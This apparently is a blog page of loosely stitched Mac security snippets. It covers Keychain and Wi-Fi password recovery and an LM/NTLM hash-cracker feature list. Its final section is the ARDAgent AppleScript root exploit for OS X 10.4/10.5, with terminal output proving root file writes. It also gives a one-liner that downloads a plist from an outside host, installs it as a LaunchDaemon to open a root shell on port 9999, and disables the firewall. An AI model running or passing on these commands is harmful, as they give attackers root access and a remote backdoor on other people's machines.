There are a couple of ways to get to this data, including simply using the Keychain Access utility, but probably the easiest way to get to this specific data is to go through Airport System Preferences. Go into the Airport control area of Mac OS X and you’ll find a list of all the different networks you’ve successfully joined in the past, including those with and without passwords.

Open up System Preferences –> Network –> Airport –> Configure…:

Pick the network you need and click on the little “EDIT” button and a new window pops up with specific information on this network:

Click on the “Show Password” checkbox, and ….

The password is shown in hex but dont worry it’ll still work when you paste it into your new WIFI profile if you choose to create one.

Have you forgotten a password to a website, email account, or other password? If you use Mac OS X’s Keychain, chances are that your password can be easily retrieved.

First off, open Keychain Access.app (located in /Applications/Utilities/).

Once there, scroll through the list of keys until you find the one that you’re looking for. Double click on it and check the box that says, “Show Password.” Once you authenticate with your user credentials, your forgotten password will be displayed in the text box.

Features:
» Runs on Windows, Linux/Unix, Mac OS X, …
» Cracks LM and NTLM hashes.
» Free tables available for Windows XP and Vista.
» Brute-force module for simple passwords.
» LiveCD available to simplify the cracking.
» Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
(more…)

If you’ve forgotten your Mac’s admin account password, don’t worry. Assuming you haven’t locked out OpenFirmware, it’s a pretty simple task to change your password back to something you know.

Here’s how:
(more…)

Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through
AppleScript:
osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘;

I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “touch /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e ‘tell app “ARDAgent” to do shell script “rm /etc/somefile”‘
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999’ and find yourself at a root shell.

To remove, run ‘launchctl unload com.apple.bash’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.